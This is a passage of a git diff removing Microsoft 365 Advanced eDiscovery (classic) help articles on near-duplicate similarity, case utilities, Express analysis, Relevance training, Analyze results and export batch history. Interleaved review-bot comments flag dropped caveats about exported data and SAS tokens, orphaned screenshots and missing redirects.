-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, Document Similarity is the minimal level of resemblance required for two documents to be considered as near-duplicates.
-
-> [!TIP]
-> For most business applications, it is recommended to use a Similarity value of 60%-75%. For very poor quality optical character recognition (OCR) material, lower Similarity values can be applied.
-
-> [!NOTE]
-> After it's set and run for a given case, the Similarity value cannot be changed.
-
-Within a Near-duplicate (ND) set, there may be documents with a level of resemblance below the Similarity threshold. For a document to join an ND set, there must be at least one document in the ND set with a level of resemblance exceeding the Similarity.
-
-For example, assume the Similarity is set to 80%, document F1 resembles document F2 at a level of 85%, and document F2 resembles document F3 at a level of 90%.
-
-However, document F1 may resemble document F3 at a level of only 70%, which is below the threshold. Nonetheless, in this example, documents F1, F2, and F3 all appear in the one ND set. Similarly, using a Similarity value of 80%, we may have created two sets, EquiSet-1 and EquiSet-2. EquiSet-1 contains documents E1 and E2. Equiset-2 contains documents F1, F2, and F3.
-
-The levels of resemblance are illustrated as follows:
-
-![Document similarity](../media/3907ea7d-e28a-4027-8fc3-be090dd39144.gif)
-
-Assume that another document, X1, is now inserted. The resemblance between X1 and E3 is 87%. Similarly, the resemblance between X1 and F1 is 92%. As a result, EquiSet -1, EquiSet -2, and X1 are now combined into one ND set.
-
-![Document Similarity](../media/d140d347-33d5-475a-af04-594a0f2ab13d.gif)
-
-> [!NOTE]
-> If any two documents are assigned to one ND set, they will remain together in the same ND set, even if additional documents are added to the set or if the sets are merged.
-
-After sets are merged, the Pivot document can change when new documents are added to a set.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Setting Analyze options](set-analyze-options-in-advanced-ediscovery.md)
-
-[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)
-
-[Setting Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md)
-
-[Viewing Analyze results](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/use-advanced-ediscovery-utilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-advanced-ediscovery-utilities.md deleted file mode 100644
@@ -1,110 +0,0 @@
-title: "Use Advanced eDiscovery utilities"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 66ca9993-75f4-4724-aea2-5a0719b660c1
-description: "Learn about the utilities in Advanced eDiscovery, including case log, clear data, process errors, modify Relevance, and transparency analysis."
-
-# Use Advanced eDiscovery (classic) utilities
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The utilities that are displayed and available in Advanced eDiscovery depend on context and user roles.
-
-## Case log
-
-The Case log provides a detailed list of application processing activities, which can be used for tracking, troubleshooting, and for addressing errors and warnings. The log can be generated and stored locally on the host or server, or sent directly to an email address.
-
-The log file can also be downloaded to the client's computer. The client download option may be enabled or disabled according to configuration and user role.
-
-1. In the menu bar, click the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Utilities** tab, select **Case log \> Setup**.
-
-3. Select the **Log level** as follows:
-
- - **Standard**: Includes the basic log data. This option is usually necessary for monitoring, and should be used unless recommended otherwise.
-
- - **Minimal**: Used for very large cases, and returns only the latest data.
-
-4. Click **Run Case log**. The log is generated and path is displayed. The task progress information for the current and last task is displayed in the Task status pane.
-
-## Clear data
-
-If it is necessary to delete or reinitialize case data, the database instance must be initialized. The Clear data utility deletes all specified entries from the case database, text files, case folder, and accumulated results. The function can only be performed by an administrator.
-
-> [!IMPORTANT]
-> This action is not reversible and will clear all Relevance tagging and analysis performed by the expert. Save a backup of data, if necessary. Use this option with extreme care. Deleting tagged and ranked files can impact the Relevance results.
-
-1. In the menu bar, click the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Utilities** tab, select **Clear data \> Setup**.
-
-3. Select an option for the information to initialize:
-
- - **Relevance**: Deletes all work done in Relevance, including definition of loads and association of files to loads. It deletes all samples and tagging.
-
- - **Near-duplicates and email threads**: Deletes all analysis information of near-duplicates and email threads.
-
- - **Themes**: Deletes themes-related data.
-
- - **Export history**: Deletes history information of Export batches.
-
-4. Click **Clear data**. The case data is cleared. The task progress information for the current and last task is displayed in the **Task status** pane.
-
-## Modify Relevance
-
-This section describes how to skip or roll back a Relevance sample.
-
-1. In the menu bar, click the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Utilities** tab, select **Modify relevance**.
-
-3. Select from the options:
-
- - **Skip current sample - for current user**: This will tag, as **Skip**, all untagged files in the open case sample of the user running the utility. Relevance processing will not be performed on files tagged as **Skip**.
-
- - **Skip current sample - all open samples**: This will tag, as **Skip**, all untagged files in all open samples for all users. This option is not recommended if users are currently tagging samples.
-
- - **Roll back last sample**: The last completed Relevance training sample will be rolled back, regardless of whether it is before or after the "Calculate" process. Rollback of a catch-up sample is not allowed.
-
-4. Click **Execute** to run.
-
-## Transparency analysis
-
-The Transparency analysis utility enables a detailed view of files and their assigned Relevance score. The report can be used as a sanity check or to compare the relevance of a file defined by a human reviewer as compared to the relevance assigned by Advanced eDiscovery.
-
-In addition to Relevance scores, Advanced eDiscovery calculates and assigns keyword weights that consider the keyword context. The same word in a file can be assigned different weights, depending on context and location. Each keyword is marked using an increasing scale of color intensity ranging from yellow to dark orange and varying shades of gray. Color coding is used to visually indicate the word's relative positive or negative contribution to the Relevance score.
-
-In a multiple-issue case scenario, a Transparency analysis report can be generated for each issue.
-
-1. In the menu bar, click the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Utilities** tab, select **Transparency analysis \> Setup**.
-
-3. In ** File ID **, enter the file ID of the file to process.
-
-4. In the **Issue** list, select the pertinent issue.
-
-5. Click **Transparency analysis**. Upon completion, the Transparency analysis report for the file is displayed, which shows how the marked keyword colors correlate to the overall Relevance score.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Defining case and tenant settings](define-case-and-tenant-settings-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/use-express-analysis-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-express-analysis-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,132 +0,0 @@
-title: "Use Express Analysis in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 50580099-3dc0-44a1-a9b6-5ca6d396316b
-description: Learn how to run the Express analysis mode of Advanced eDiscovery and then export the results.
-ms.custom: seo-marvel-apr2020
-
-# Use Express Analysis in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-You can use **Express analysis** to quickly analyze a case and export the results.
-
-You can use express analysis to calculate near-duplicates and email threads and calculate themes. You can also set certain parameters for themes, document similarity and the export files in the [Advanced settings for Express analysis](use-express-analysis-in-advanced-ediscovery.md#BK_AdvancedSettings).
-
-## Run Express analysis
-
-1. In the **Express analysis** (1) tab, select a container to enable the ** Express analysis ** (2), and **Advanced settings** buttons.
-
- ![Screenshot of the Express analysis page](../media/60009974-5d1f-4971-8ebe-e5ec74e7fd2a.jpg)
-
-2. Under **Analyze parameters**:
-
- - Check **Calculate near-duplicates and email threads** if you want to run the analysis. It is selected by default.
-
- - Check **Calculate Themes** to process all files and assign themes to them. It is selected by default.
-
-3. Under **Export destination**:
-
- - Check **Download to local machine** to download to your local computer.
-
- - If you check **Export to user-defined Azure blob** then you can also specify a container URL and SAS token.
-
- > [!NOTE]
- > Once an export package is stored to the user defined Azure blob, the data is no longer managed by Advanced eDiscovery. it is managed by the Azure blob. This means if you delete the case, the exported files will still remain on the Azure blob.
-
- - **Save SAS token for future export session**: If checked, the SAS token will be encrypted in the Advanced eDiscovery's internal database for future use.
-
- > [!NOTE]
- > Currently the SAS token expires after a month. If you try to download after more than a month you have to undo last session, then export again.
-
-4. To start the express analysis with default settings, choose **Express analysis**, and the **Task status** page will display
-
- On the **Task status** page you can expand the **Process**, **Analyze** and **Export** tabs to display details about the express run.
-
- ![Screenshot of Advanced eDiscovery Express analysis Task status page](../media/bf30ab02-9828-4a6d-a485-0babc2c49ae5.jpg)
-
-5. Choose the **Express analysis summary** page to list detailed information about the run.
-
- On the bottom of the **Express analysis summary** page, choose **Download last session** to download the analysis files tp your local computer. You will first have to download eDiscovery Export tool and paste the Export key to the eDiscovery Export tool.
-
-## Advanced settings for Express analysis
-<a name="BK_AdvancedSettings"> </a>
-
-You can optionally set **Advanced settings** to change the default Express analysis parameters.
-
-1. In the **Analyze** section:
-
- - In the **Near duplicates and email threads**, enter the **Document similarity** value, or accept the default of 65%.
-
- - In the **Max number of themes** enter or select a value for the number of themes to create. The default is 200.
-
- > [!NOTE]
- > Increasing the number of themes affects performance, as well as the ability of a theme to generalize. The higher the number of themes, the more granular they are. For example, if a set of 50 themes include a theme such as "Basketball, Spurs, Clippers, Lakers"; 300 themes may include separate themes: "Spurs", "Clippers", "Lakers". If you had no awareness of the theme "Basketball" and use this feature for ECA, seeing the theme "Basketball" could be useful. But, if the processing had too many themes, you may never see the word "Basketball" and may not know that Spurs and Clippers are good Basketball themes to review, rather than items that go on boots and used for hair.
-
- - In the **Suggested themes** choose **Modify** to suggest theme words to control Themes processing. Advanced eDiscovery will focus on these suggested words and try to create one or more relevant themes, based on the "Max number of themes" settings.
-
- For example, if the suggested word is "computer", and you specified "2" as the "Max number of Themes", Advanced eDiscovery will try to generate two themes that relate to the word "computer". The two themes might be "computer software" and "computer hardware", for example.
-
- ![Add suggested theme](../media/06e9ffd3-a76c-423b-b450-9e465eb9a02f.png)
-
- - **Mode** From the drop-down list, select a **Themes** option:
-
- - **Create and apply model**: Calculates themes by models from a segment of the files and then distributes files among them.
-
- - **Create model**: Calculates a themes model from a segment of the files. The Apply process of dividing files is done separately at another time.
-
- - **Apply model**: This option is only shown if a model was created previously and not yet applied. This will divide the files based on the themes.
-
-2. In the **Export** section:
-
-1. In the **Select export batch**:
-
- - From the **Export batch** list, select the batch name or export results to Export batch 01, (the default batch).
-
- - To export results for new files that you added to an existing case, continue with your current batch. To create a session in the batch, select the same batch number and click **Create export session** You can use this option to export the same parameters as the previous batch, in an incremental manner.
-
- - To export to a new batch, click **Add** ![add icon](../media/c2dd8b3a-5a22-412c-a7fa-143f5b2b5612.png) and enter a new name in **Batch name** (or accept the default) and a description in **Batch description**. Click **OK**.
-
- - To edit a batch name or description, select the name in **Export batch**, click **Edit** ![Edit icon](../media/3d613660-7602-4df2-bdb9-14e9ca2f9cf2.png), and then modify the fields.
-
- > [!NOTE]
- > After you've run sessions for an export batch, they cannot be deleted. In addition, only some parameters can be edited once the first session is run.
-
- - To create a duplicate export batch, choose **Duplicate export batch** ![Create a duplicate export batch icon](../media/3f6d5f59-e842-4946-a493-473528af0119.jpg) and enter a name and a description for the duplicate batch in the panel.
-
- - To delete an export batch, choose **Delete** ![Delete an export batch icon](../media/92a9f8e0-d469-48da-addb-69365e7ffb6f.jpg).
-
- - To view the history of a batch, choose **Batch history** ![View history icon](../media/a80cc320-d96c-4d91-8884-75fe2cb147e2.jpg).
-
-2. Under Define p **opulation:** Select **Include only files above Relevance cut-off score** and/or **Refine export batch** if you want to fine-tune the settings for your export batch. If you select **Include only files above Relevance cut-off score**, then the **Issue** is enabled, and if the file's relevance score is higher than the cut-off score for the selected issue, then the file is exported. The file will be exported unless it's excluded by the ' **For review** filter. If you select **Refine export batch**, then the **De-dupe** and **Filter by 'For review' field** radio buttons are enabled. If you choose **De-dupe**, then duplicates files will be filtered-out according to the policy defined: [Case level (default): from every set of duplicate files in the entire case, all but one file will be de-duped. Custodian level: from every set of duplicate files of the same custodian, all but one file will be de-duped. A record of all duplicate files is available in export output. If you choose **Filter by 'For review'** field, select **Modify under Metadata** to enter your **'For review'**field settings. Select **Include input files**to include source files in the package content. You can clear this option to speed up the export process. Note that the Native files will be exported in any case.
-
-3. Under **Define metadata**, select from the following options in the **Export template** list (once per session).
-
- - **Standard**: Basic set of data items, metadata, and properties. Use this option when import data was already processed in Advanced eDiscovery and export data is uploaded to a system that already contains the files. By default, export template columns are created and filled.
-
- - **All**: Full set of standard metadata including all processing data, as well as Analyze and Relevance scores. This template is required when Advanced eDiscovery performs the processing and file data is uploaded to an external system for the first time.
-
- - **Issues**: Select **All Issues** or select a particular issue you have created.
-
-Choose **OK**to save the advanced settings, **Restore defaults** to use default values, or **Cancel** to cancel setting the advanced settings.
-
-## See also
-<a name="BK_AdvancedSettings"> </a>
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
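Review bot: this deletion drops the two notes under step 3 of "Run Express analysis" that explain where exported data and credentials end up: an export package written to a user-defined Azure blob "is no longer managed by Advanced eDiscovery" and remains after the case is deleted, and a saved SAS token is kept in the internal database and expires after a month. If export to a user-defined blob is still reachable from any article that stays published, move both caveats there before removing this file, because they are what tells an admin that exported case data outlives the case. The BK_AdvancedSettings anchor is also declared twice, under "Advanced settings for Express analysis" and again under "See also", so inbound deep links to it should be searched for and removed together with the file.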
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/use-relevance-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-relevance-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,144 +0,0 @@
-title: "Use the Relevance module in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 5d671821-d188-42da-a9ce-9cfe92beedfd
-description: "Learn about the Relevance module in Advanced eDiscovery, including a workflow and guidelines and steps for training and file review."
-
-# Use the Relevance module in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, the Relevance module includes the Relevance training and review of files related to a case. The Relevance workflow is shown and described as follows:
-
-![Relevance workflow](../media/44c67dd2-7a20-40a9-b0ed-784364845c77.gif)
-
-- **Cycles of assessment and tracking**:
-
- - **Assessment**: Advanced eDiscovery enables early assessment based on a random sample of files and uses this assessment to apply decisions to determine the performance of the predictive coding process.
-
- - **Track**: Advanced eDiscovery calculates and displays interim results of the assessment while monitoring statistical validity of the process.
-
-- **Cycles of training and tracking**:
-
- - **Tag**: Advanced eDiscovery learns Relevance criteria specific to each issue based on the expert's iterative review and tagging of individual files.
-
- - **Track**: Advanced eDiscovery calculates and displays interim results of the Relevance training while monitoring statistical validity of the process.
-
-- **Batch calculation**: Advanced eDiscovery takes the accumulated and learned Relevance criteria, applies it to the entire file collection, and generates Relevance scores for each file.
-
-- **Decide**: Advanced eDiscovery displays the results of the analysis applied to the entire case after Batch calculation and displays data for making document review decisions.
-
-- **Test**: Advanced eDiscovery results can be tested to verify the validity and effectiveness of the Advanced eDiscovery processing.
-
-## Guidelines for Relevance training and review
-
-Following is an overview of guidelines for Relevance training and review:
-
-- **Errors and inconsistencies**: If tagging errors are made during training, return to previous file samples to correct them. If there are too many errors to correct or there is a new perspective of the case or issue, the Relevance criteria should be redefined by the Administrator, and the Relevance training restarted.
-
-- **Tagging and training**:
-
- - Files should be tagged based on content only. Do not consider metadata, such as custodian, date, or file path.
-
- - Do not consider date range indications in the text when tagging files.
-
- - Do not consider embedded graphical images when tagging files.
-
- - If viewing a file using the **formatted text view** icon while tagging, do not consider the formatting of text. For example, a word displayed with a strikethrough (a horizontal line through its center indicating deletion) is still considered by Relevance as part of the analyzed text.
-
- - Ignore text applied to Relevance (as set by the Case Manager or Administrator) will be removed in the displayed file content in the text view in Relevance. If the values for Ignore text were defined after Relevance training already started, the new ignored text will be applied to sample files created from the point in which it was defined. The Ignore Text feature should be used cautiously, as its use may reduce the performance of file analysis
-
- - Use the **Skip tagging** option only when necessary. Advanced eDiscovery does not train based on skipped files. In assessment, if it's hard to tell whether a file is relevant, it is better to tag as Relevant (R) or Not relevant (NR) whenever possible rather than selecting **Skip**. When Advanced eDiscovery evaluates training, it can then be seen how well these types of files were processed.
-
- - Even files with a very small amount of extracted text should be tagged in training as R/NR, rather than as "Skip", when possible.
-
- - Tagging can impact the classifier as long as the file is readable and can be tagged as R/NR.
-
- - The file sequence number on the displayed Sample files list on the **Tag** tab allows the user to return to the original displayed order of the files.
-
- - You can go back to any sample and change the tagging of the assessment and training set files. The changes will be applied when creating the next sample.
-
- - Scanned Excel files in PDF format should be treated the same as native Excel files when tagging files.
-
- - When in doubt regarding the Relevance tagging of a file, consult an expert. Incorrect tagging during the Relevance training can lead to lost time later in the process and may also have a negative impact on the quality of the overall results.
-
- - Keywords that were defined in Keyword lists will be displayed in colors to help the user identify relevant files while tagging.
-
-- **Batch calculation**: Files that were tagged as R/NR by the expert will receive a score of either 0 or 100. This applies to tagging made before Batch calculation. If the expert switched the issue to Idle after Batch Calculation and continued tagging this issue, the newly tagged scores will not be 100/0 but rather the original score.
-
-- **Issues and sampling mode**: Issues are usually turned Off when work on them is completed (Relevance training is stabilized and Batch calculation was performed), when the issues are canceled, or when another user is working on the issues.
-
-## Steps in Relevance training
-
-In the **Relevance \> Track** tab, Advanced eDiscovery provides recommendations on how to proceed in the processing, with the following next steps. The implications are described below when each of the following steps is recommended in the Relevance training process.
-
-- Tagging / Continue tagging: File review and Relevance tagging performed by an expert for each file and issue within a sample.
-
- - Implication: An existing sample needs to be tagged.
-
-- Assessment / Continue assessment: Enables early validation of case issue relevance and a preliminary view of the relevance of the file population imported for the current case.
-
- - Implication: More assessment is required or recommended.
-
-- Training / Continue training: Process during which Advanced eDiscovery learns from the expert who is tagging the file samples and acquires the ability to identify Relevance criteria pertinent to each issue within the context of each case.
-
- - Implication: The issue needs more training; the next sample should be created and tagged.
-
-- Batch calculation: Relevance process in which Advanced eDiscovery takes the knowledge acquired during the training stage and applies it to the entire file population. All files in the pertinent file group are assessed for relevance and assigned a Relevance score.
-
- - Implication: The issue has stabilized, and Batch calculation can be performed.
-
-- Catch-up: Relevance indicates when an expert reviews and tags a sample of files selected from an additional file load during a Rolling Loads scenario.
-
- - Implication: A new load has been added, and Catch-up is required to continue working.
-
-- Tag inconsistencies: Process identifies, via an Advanced eDiscovery algorithm, inconsistencies in the file tagging process that may negatively impact the analysis.
-
- - Implication: The next sample will include files that have been tagged in previous samples, and their tagging must be redone.
-
-- Update classifier: Allows the user to apply tagging or seeding changes.
-
- - Implication: Tagging and seeding changes can be applied without needing to manually run another Relevance sample.
-
-- On hold: The Relevance training process is completed.
-
- - Implication: No Relevance training is required at this point.
-
-Although Advanced eDiscovery guides you through the process, with recommended Next steps at different stages, it also allows you to navigate between tabs and pages, and to make choices to address situations that may be pertinent to your individual case, issue, or document review process.
-
-It is possible to accept or override Advanced eDiscovery Next step processing choices. If you want to perform a step other than the recommended Next step, click the **Next step** listed in the expanded issue display in the dialog, click the **Modify** button next to the Next step, and select another Next step option.
-
-> [!NOTE]
-> Some options may remain disabled after unlocking as they are not supported for use at that point in the process.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
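Review bot: the "See also" block at the end of this file points to seven sibling articles, from office-365-advanced-ediscovery.md to test-relevance-analysis-in-advanced-ediscovery.md, and this page is the workflow overview that introduces them, so removing it on its own would leave those pages without their entry point. Confirm that all seven are deleted or redirected in the same change, check any that remain for links back to use-relevance-in-advanced-ediscovery.md, and register a redirect for this URL, since the header shows only "deleted file mode 100644" with no replacement target.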
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/view-analyze-results-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/view-analyze-results-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,84 +0,0 @@
-title: "View Analyze results in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 5974f3c2-89fe-4c5f-ac7b-57f214437f7e
-description: "Understand where to view the results of the Analyze process in Advanced eDiscovery, including definitions of the displayed task options."
-
-# View Analyze results in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, progress and results for the Analyze process can be viewed in a variety of displays as described below.
-
-## View Analyze task status
-
-In **Prepare \> Analyze \> Results \> Task status**, the status is displayed during and after Analyze process execution.
-
-![Analyze task status](../media/d0372978-ce08-4f4e-a1fc-aa918ae44364.png)
-
-The tasks displayed may vary depending on the options selected.
-
-- **ND/ET: setup**: Prepares for the run, for example, sets run and case parameters.
-
-- **ND/ET: ND calculation**: Processes Near-duplicate analysis of files.
-
-- **ND/ET: ET calculation**: Performs Email Thread analysis on the entire email set.
-
-- **ND/ET: pivots and similarities**: Performs pivot and file similarity processing.
-
-- **ND/ET: metadata update**: Finalizes the new data collected on the files in the database.
-
-- **Themes: themes calculation**: Runs themes analysis. (Displayed only if selected.)
-
-- **Task status**: This line is displayed after task completion. While tasks are running, run duration is displayed.
-
-> [!NOTE]
-> The Analyze results of Near-duplicates and Email Threads (ND and ED) applies to the number of documents to be processed. It does not include Exact duplicate files.
-
-## View Near-duplicates and Email Threads status
-
-The **Target** population results display the number of documents, emails, attachments, and errors in the target population.
-
-The **Documents** results display the number of pivots, unique near-duplicates, and exact duplicate files.
-
-The **Emails** results display the number of inclusive, inclusive minus, unique inclusive copies, and the rest of the email messages. The different types of email results are:
-
-- **Inclusive**: An inclusive email is the terminating node in an email thread and contains all the previous history of that thread. As a result, the reviewer can safely focus on the inclusive email, without the need to read the previous messages in the thread.
-
-- **Inclusive minus**: An inclusive email is designated as inclusive minus if there are one or more different attachments associated with the parents of the inclusive message. In this context, the term Parent is used for messages located upwards on the email thread or conversations included in that specific inclusive email. A reviewer can use the inclusive minus indication as a signal that although it might not be necessary to review the content of the inclusive email parents, it may be useful to review the attachments associated with the inclusive path parents.
-
-- **Inclusive copy**: An inclusive email is designated as inclusive copy if it's the copy of another message marked as inclusive or inclusive minus. In other words, this message has the same subject and body as another inclusive message and, as such, co-resides in the same node. Because inclusive copy messages contain the same content, they can usually be skipped in the review process.
-
-- **The rest**: This indicates email that doesn't contain any unique content, and therefore doesn't fall into any of the previous three categories. These email messages don't need to be reviewed. If a message contains an attachment that isn't on a later inclusive email, then the attachment might need to be reviewed. This is indicated by the existence of an inclusive minus email within the thread.
-
-The **Attachments** results display the number of attachments, according to such type as unique and duplicates.
-
-![Near-duplicates and Email Threads](../media/54491303-0ee3-4739-b42e-d1ee486842fd.png)
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Setting Analyze options](set-analyze-options-in-advanced-ediscovery.md)
-
-[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)
-
-[Setting Analyze advanced settings](view-analyze-results-in-advanced-ediscovery.md)
-
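Review bot: the two images embedded here, ../media/d0372978-ce08-4f4e-a1fc-aa918ae44364.png and ../media/54491303-0ee3-4739-b42e-d1ee486842fd.png, lose a referencing article with this deletion; if no other article embeds them, remove the media files in the same change so orphaned screenshots do not stay in the repository. Separately, the last "See also" entry is labelled "Setting Analyze advanced settings" but targets view-analyze-results-in-advanced-ediscovery.md, the file being deleted, so a search for inbound links to this file should expect that self-reference and not treat it as an external dependency.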
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/view-batch-history-and-export-past-results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/view-batch-history-and-export-past-results.md deleted file mode 100644
@@ -1,66 +0,0 @@
-title: "View batch history and export past results in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 35d52b41-75ab-4144-9edf-31e11453bd5d
-description: "Learn how to view detailed information for selected export batch sessions and how to undo the last export session in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# View batch history and export past results in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The following section describes additional options for batch viewing and export of data in Advanced eDiscovery.
-
-## Viewing Export batch history and exporting previous batches
-
-The Export history dialog provides detailed information of selected export batch sessions and also provides the ability to undo the last session.
-
-1. In **Export \> Setup**, select the batch name from the **Export batch** drop-down list.
-
-2. To the right of the export batch name, select the **Batch history** icon:
-
- ![Export batch history icon](../media/a14f6ef9-0c3c-4851-b65d-9380f2d8a38a.gif)
-
- The Batch history dialog is displayed.
-
- ![Export batch history](../media/04c5b75c-348c-491d-b4fe-716659333890.png)
-
-3. If it is necessary to roll back a previous session, click **Undo last session**. Rollback can be performed multiple times, which cancels the last session.
-
-4. If you want to download data at any time from a previously executed export batch session, click the **Download** icon ![Export batch history download icon](../media/de69b920-a6ac-4ddb-b93e-e1cc5888e6c4.gif) next to the desired export batch to be exported.
-
-5. When the **Shared access signature** dialog is displayed, click **Copy to clipboard** to copy the export session data to the local machine, and then click **Close**. The Security &amp; Compliance Center **eDiscovery Export Tool** dialog is displayed.
-
- ![Export eDiscovery dialog](../media/01f79d2d-6da0-45e6-9c6f-ab12347572cb.gif)
-
-6. In the **eDiscovery Export Tool** dialog:
-
-1. In **Paste the Shared Access Signature that will be used to connect to the source**, paste the **Shared access signature** value, which was previously copied to the clipboard.
-
-2. Click **Browse** to select the target location for storing the downloaded export files on a local machine.
-
-3. Click **Start**. The export files are downloaded to the local machine.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Exporting results ](export-results-in-advanced-ediscovery.md)
-
-[Export report fields](export-report-fields-in-advanced-ediscovery.md)
-
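Review bot: step 5 calls the value copied from the Shared access signature dialog "export session data", but step 6.1 shows it is the shared access signature itself, pasted into the eDiscovery Export Tool "to connect to the source". If this download procedure is carried into a replacement article, name the value a shared access signature in both steps and state that it grants access to the export, so readers treat the clipboard contents as a credential. The sub-steps under step 6 also restart at 1 without indentation, which breaks the nesting; fix that if the text is reused.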
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/view-process-module-results-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/view-process-module-results-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,111 +0,0 @@
-title: "View Process module results in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: c6f016cb-409f-4ae9-911c-1395cf0c86ea
-description: "Learn about how to find the results of a Process Module run in Advanced eDiscovery, including task status and process summary."
-
-# View Process module results in Advanced eDiscovery (classic)
-
-After **Prepare** \> **Process** is initiated, you can view progress and results.
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-## Process task status
-
